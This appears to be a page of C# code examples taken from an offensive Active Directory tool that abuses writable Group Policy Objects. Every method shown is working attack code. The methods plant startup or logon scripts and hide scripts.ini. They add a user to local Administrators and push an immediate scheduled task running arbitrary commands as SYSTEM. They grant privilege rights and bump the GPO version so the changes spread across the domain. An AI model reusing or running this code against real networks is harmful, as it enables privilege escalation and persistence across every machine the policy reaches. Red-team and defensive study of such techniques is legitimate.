Ejemplo n.º 1
0
        public static void NewStartupScript(string ScriptName, string ScriptContents, string Domain, string DomainController, string GPOName, string DistinguishedName, string objectType)
        {
            string hidden_ini;
            string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);

            string path        = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
            string hidden_path = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";

            if (objectType.Equals("Computer"))
            {
                hidden_ini = Environment.NewLine + "[Startup]" + Environment.NewLine + "0CmdLine=" + ScriptName + Environment.NewLine + "0Parameters=" + Environment.NewLine;
            }
            else
            {
                hidden_ini = Environment.NewLine + "[Logon]" + Environment.NewLine + "0CmdLine=" + ScriptName + Environment.NewLine + "0Parameters=" + Environment.NewLine;
            }

            string GPT_path = path + "\\GPT.ini";

            // Check if GPO path exists
            if (Directory.Exists(path) && objectType.Equals("Computer"))
            {
                path        += "\\Machine\\Scripts\\Startup\\";
                hidden_path += "\\Machine\\Scripts\\scripts.ini";
            }
            else if (Directory.Exists(path) && objectType.Equals("User"))
            {
                path        += "\\User\\Scripts\\Logon\\";
                hidden_path += "\\User\\Scripts\\scripts.ini";
            }
            else
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            // check if the folder structure for adding admin user exists in SYSVOL
            if (!Directory.Exists(path))
            {
                Directory.CreateDirectory(path);
            }
            path += ScriptName;
            if (File.Exists(path))
            {
                Console.Error.WriteLine("[!] A Startup script with the same name already exists. Choose a different name.");
                return;
            }

            if (File.Exists(hidden_path))
            {
                // Remove the hidden attribute of the file
                var attributes = File.GetAttributes(hidden_path);
                if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden)
                {
                    attributes &= ~FileAttributes.Hidden;
                    File.SetAttributes(hidden_path, attributes);
                }

                string        line;
                List <string> new_list = new List <string>();
                using (StreamReader file = new StreamReader(hidden_path))
                {
                    while ((line = file.ReadLine()) != null)
                    {
                        new_list.Add(line);
                    }
                }

                List <int> first_element = new List <int>();

                string q = "";
                foreach (string item in new_list)
                {
                    try
                    {
                        q = Regex.Replace(item[0].ToString(), "[^0-9]", "");
                        first_element.Add(Int32.Parse(q));
                    }
                    catch { continue; }
                }

                int max = first_element.Max() + 1;
                new_list.Add(hidden_ini = max.ToString() + "CmdLine=" + ScriptName + Environment.NewLine + max.ToString() + "Parameters=");

                using (StreamWriter file2 = new StreamWriter(hidden_path))
                {
                    foreach (string l in new_list)
                    {
                        file2.WriteLine(l);
                    }
                }

                //Add the hidden attribute of the file
                File.SetAttributes(hidden_path, File.GetAttributes(hidden_path) | FileAttributes.Hidden);
            }

            else
            {
                File.WriteAllText(hidden_path, hidden_ini);
                //Add the hidden attribute of the file
                var attributes = File.GetAttributes(hidden_path);
                File.SetAttributes(hidden_path, File.GetAttributes(hidden_path) | FileAttributes.Hidden);
            }

            Console.WriteLine("[+] Creating new startup script...");
            File.WriteAllText(path, ScriptContents);

            if (objectType.Equals("Computer"))
            {
                GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewStartupScript", "Computer");
            }
            else
            {
                GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewStartupScript", "User");
            }
        }
Ejemplo n.º 2
0
        public static void NewLocalAdmin(string UserAccount, string Domain, string DomainController, string GPOName, string DistinguishedName, bool Force)
        {
            // Get SID of user who will be local admin
            PrincipalContext principalContext = new PrincipalContext(ContextType.Domain, DomainController);
            UserPrincipal    userPrincipal    = null;

            try
            {
                userPrincipal = UserPrincipal.FindByIdentity(principalContext, IdentityType.SamAccountName, UserAccount);
                Console.WriteLine($"[+] SID Value of {UserAccount} = {userPrincipal.Sid.Value}");
            }
            catch
            {
                Console.Error.WriteLine($"[-] Could not find user {UserAccount} in the {Domain} domain.");
            }

            string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);

            string template = @"[Unicode]
Unicode=yes
[Version]
signature=""$CHICAGO$""
Revision=1";

            string[] newLocalAdmin = { "[Group Membership]", "*S-1-5-32-544__Memberof =", "*S-1-5-32-544__Members = *" + userPrincipal.Sid.Value };

            string gpoPath = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
            string gptPath = gpoPath + "\\GPT.ini";

            // Check if GPO path exists
            if (Directory.Exists(gpoPath))
            {
                gpoPath += "\\Machine\\Microsoft\\Windows NT\\SecEdit\\";
            }
            else
            {
                Console.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            // check if the folder structure for adding admin user exists in SYSVOL
            if (!Directory.Exists(gpoPath))
            {
                Directory.CreateDirectory(gpoPath);
            }
            gpoPath += "GptTmpl.inf";
            if (File.Exists(gpoPath))
            {
                bool exists = false;
                Console.WriteLine("[+] File exists: {0}", gpoPath);
                string[] readText = File.ReadAllLines(gpoPath);

                foreach (string s in readText)
                {
                    // Check if memberships are defined via group policy
                    if (s.Contains("[Group Membership]"))
                    {
                        exists = true;
                    }
                }

                // if memberships are defined and force is NOT used
                if (exists && !Force)
                {
                    Console.WriteLine("[!] Group Memberships are already defined in the GPO. Use --force to make changes. This option might break the affected systems!");
                    return;
                }

                // if memberships are defined and force is used
                if (exists && Force)
                {
                    using (StreamWriter file2 = new StreamWriter(gpoPath))
                    {
                        foreach (string l in readText)
                        {
                            if (l.Replace(" ", "").Contains("*S-1-5-32-544__Members="))
                            {
                                if (l.Replace(" ", "").Contains("*S-1-5-32-544__Members=") && (string.Compare(l.Replace(" ", ""), "*S-1-5-32-544__Members=") > 0))
                                {
                                    file2.WriteLine(l + ", *" + userPrincipal.Sid.Value);
                                }
                                else if (l.Replace(" ", "").Contains("*S-1-5-32-544__Members=") && (string.Compare(l.Replace(" ", ""), "*S-1-5-32-544__Members=") == 0))
                                {
                                    file2.WriteLine(l + " *" + userPrincipal.Sid.Value);
                                }
                            }
                            else
                            {
                                file2.WriteLine(l);
                            }
                        }
                    }
                    GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
                    return;
                }

                // if memberships are not defined
                if (!exists)
                {
                    Console.WriteLine("[+] The GPO does not specify any group memberships.");
                    using (StreamWriter file2 = new StreamWriter(gptPath))
                    {
                        foreach (string l in readText)
                        {
                            file2.WriteLine(l);
                        }
                        foreach (string l in newLocalAdmin)
                        {
                            file2.WriteLine(l);
                        }
                    }
                    GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
                }
            }
            else
            {
                Console.WriteLine("[+] Creating file " + gpoPath);
                string new_text = null;
                foreach (string x in newLocalAdmin)
                {
                    new_text += Environment.NewLine + x;
                }
                File.WriteAllText(gpoPath, template + new_text);
                GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, gptPath, "AddLocalAdmin", "Computer");
            }
        }
Ejemplo n.º 3
0
        public static void NewImmediateTask(string Domain, string DomainController, string GPOName, string DistinguishedName, string TaskName, string Author, string Arguments, string Command, bool Force, string ObjectType)
        {
            string ImmediateTaskXML;
            string start = @"<?xml version=""1.0"" encoding=""utf-8""?><ScheduledTasks clsid=""{CC63F200-7309-4ba0-B154-A71CD118DBCC}"">";
            string end   = @"</ScheduledTasks>";

            if (ObjectType.Equals("Computer"))
            {
                ImmediateTaskXML = string.Format(@"<ImmediateTaskV2 clsid=""{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}"" name=""{1}"" image=""0"" changed=""2019-03-30 23:04:20"" uid=""{4}""><Properties action=""C"" name=""{1}"" runAs=""NT AUTHORITY\System"" logonType=""S4U""><Task version=""1.3""><RegistrationInfo><Author>{0}</Author><Description></Description></RegistrationInfo><Principals><Principal id=""Author""><UserId>NT AUTHORITY\System</UserId><LogonType>S4U</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context=""Author""><Exec><Command>{2}</Command><Arguments>{3}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>", Author, TaskName, Command, Arguments, Guid.NewGuid().ToString());
            }
            else
            {
                ImmediateTaskXML = string.Format(@"<ImmediateTaskV2 clsid=""{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}"" name=""{1}"" image=""0"" changed=""2019-07-25 14:05:31"" uid=""{4}""><Properties action=""C"" name=""{1}"" runAs=""%LogonDomain%\%LogonUser%"" logonType=""InteractiveToken""><Task version=""1.3""><RegistrationInfo><Author>{0}</Author><Description></Description></RegistrationInfo><Principals><Principal id=""Author""><UserId>%LogonDomain%\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context=""Author""><Exec><Command>{2}</Command><Arguments>{3}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>", Author, TaskName, Command, Arguments, Guid.NewGuid().ToString());
            }

            string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);

            if (string.IsNullOrEmpty(GPOGuid))
            {
                return;
            }

            string path     = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
            string GPT_path = path + "\\GPT.ini";

            // Check if GPO path exists
            if (Directory.Exists(path) && ObjectType.Equals("Computer"))
            {
                path += "\\Machine\\Preferences\\ScheduledTasks\\";
            }
            else if (Directory.Exists(path) && ObjectType.Equals("User"))
            {
                path += "\\User\\Preferences\\ScheduledTasks\\";
            }
            else
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            // check if the folder structure for adding scheduled tasks exists in SYSVOL
            if (!Directory.Exists(path))
            {
                Directory.CreateDirectory(path);
            }
            path += "ScheduledTasks.xml";

            // if the ScheduledTasks.xml exists then append the new immediate task
            if (File.Exists(path))
            {
                if (Force)
                {
                    Console.WriteLine("[+] Modifying " + path);
                    string        line;
                    List <string> new_list = new List <string>();
                    using (StreamReader file = new StreamReader(path))
                    {
                        while ((line = file.ReadLine()) != null)
                        {
                            if (line.Replace(" ", "").Contains("</ScheduledTasks>"))
                            {
                                line = ImmediateTaskXML + line;
                            }
                            new_list.Add(line);
                        }
                    }

                    using (StreamWriter file2 = new StreamWriter(path))
                    {
                        foreach (string l in new_list)
                        {
                            file2.WriteLine(l);
                        }
                    }

                    if (ObjectType.Equals("Computer"))
                    {
                        GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", "Computer");
                    }
                    else
                    {
                        GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", "User");
                    }
                    return;
                }
                else
                {
                    Console.WriteLine("[!] The GPO already includes a ScheduledTasks.xml. Use --Force to append to ScheduledTasks.xml or choose another GPO.");
                    return;
                }
            }
            else
            {
                Console.WriteLine($"[+] Creating file {path}");
                File.WriteAllText(path, start + ImmediateTaskXML + end);

                if (ObjectType.Equals("Computer"))
                {
                    GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", "Computer");
                }
                else
                {
                    GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "NewImmediateTask", "User");
                }
            }
        }
Ejemplo n.º 4
0
        public static void AddNewRights(string Domain, string DomainController, string GPOName, string DistinguishedName, string[] NewRights, string UserAccount)
        {
            // Get SID of user who will be local admin
            PrincipalContext ctx = new PrincipalContext(ContextType.Domain, DomainController);
            UserPrincipal    usr = null;

            try
            {
                usr = UserPrincipal.FindByIdentity(ctx, IdentityType.SamAccountName, UserAccount);
                Console.WriteLine("[+] SID Value of " + UserAccount + " = " + usr.Sid.Value);
            }
            catch
            {
                Console.Error.WriteLine($"[!] Could not find user {UserAccount} in the {Domain} domain.");
                return;
            }

            string GPOGuid = GroupPolicy.GetGPOGUID(DomainController, GPOName, DistinguishedName);

            string text = @"[Unicode]
Unicode=yes
[Version]
signature=""$CHICAGO$""
Revision = 1
[Privilege Rights]";

            string right_lines = null;

            foreach (string right in NewRights)
            {
                text        += Environment.NewLine + right + " = *" + usr.Sid.Value;
                right_lines += right + " = *" + usr.Sid.Value + Environment.NewLine;
            }

            string path     = $@"\\{Domain}\\SysVol\\{Domain}\\Policies\\{GPOGuid}";
            string GPT_path = path + "\\GPT.ini";

            // Check if GPO path exists
            if (Directory.Exists(path))
            {
                path += "\\Machine\\Microsoft\\Windows NT\\SecEdit\\";
            }
            else
            {
                Console.Error.WriteLine("[!] Could not find the specified GPO.");
                return;
            }

            // check if the folder structure for adding admin user exists in SYSVOL
            if (!Directory.Exists(path))
            {
                Directory.CreateDirectory(path);
            }
            path += "GptTmpl.inf";
            if (File.Exists(path))
            {
                bool exists = false;
                Console.WriteLine("[+] File exists: " + path);
                string[] readText = File.ReadAllLines(path);

                foreach (string s in readText)
                {
                    // Check if memberships are defined via group policy
                    if (s.Contains("[Privilege Rights]"))
                    {
                        exists = true;
                    }
                }

                // if user rights are defined
                if (exists)
                {
                    // Curently there is no support for appending user rights to exisitng ones
                    Console.Error.WriteLine("[!] The GPO already specifies user rights. Select a different attack.");
                    return;
                }

                // if user rights are not defined
                if (!exists)
                {
                    Console.WriteLine("[+] The GPO does not specify any user rights. Adding new rights...");
                    using (StreamWriter file2 = new StreamWriter(path))
                    {
                        foreach (string l in readText)
                        {
                            file2.WriteLine(l);
                        }
                        file2.WriteLine("[Privilege Rights]" + Environment.NewLine + right_lines);
                    }
                    GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "AddNewRights", "Computer");
                }
            }
            else
            {
                Console.WriteLine("[+] Creating file " + path);
                File.WriteAllText(path, text);
                GroupPolicy.UpdateVersion(Domain, DistinguishedName, GPOName, GPT_path, "AddNewRights", "Computer");
            }
        }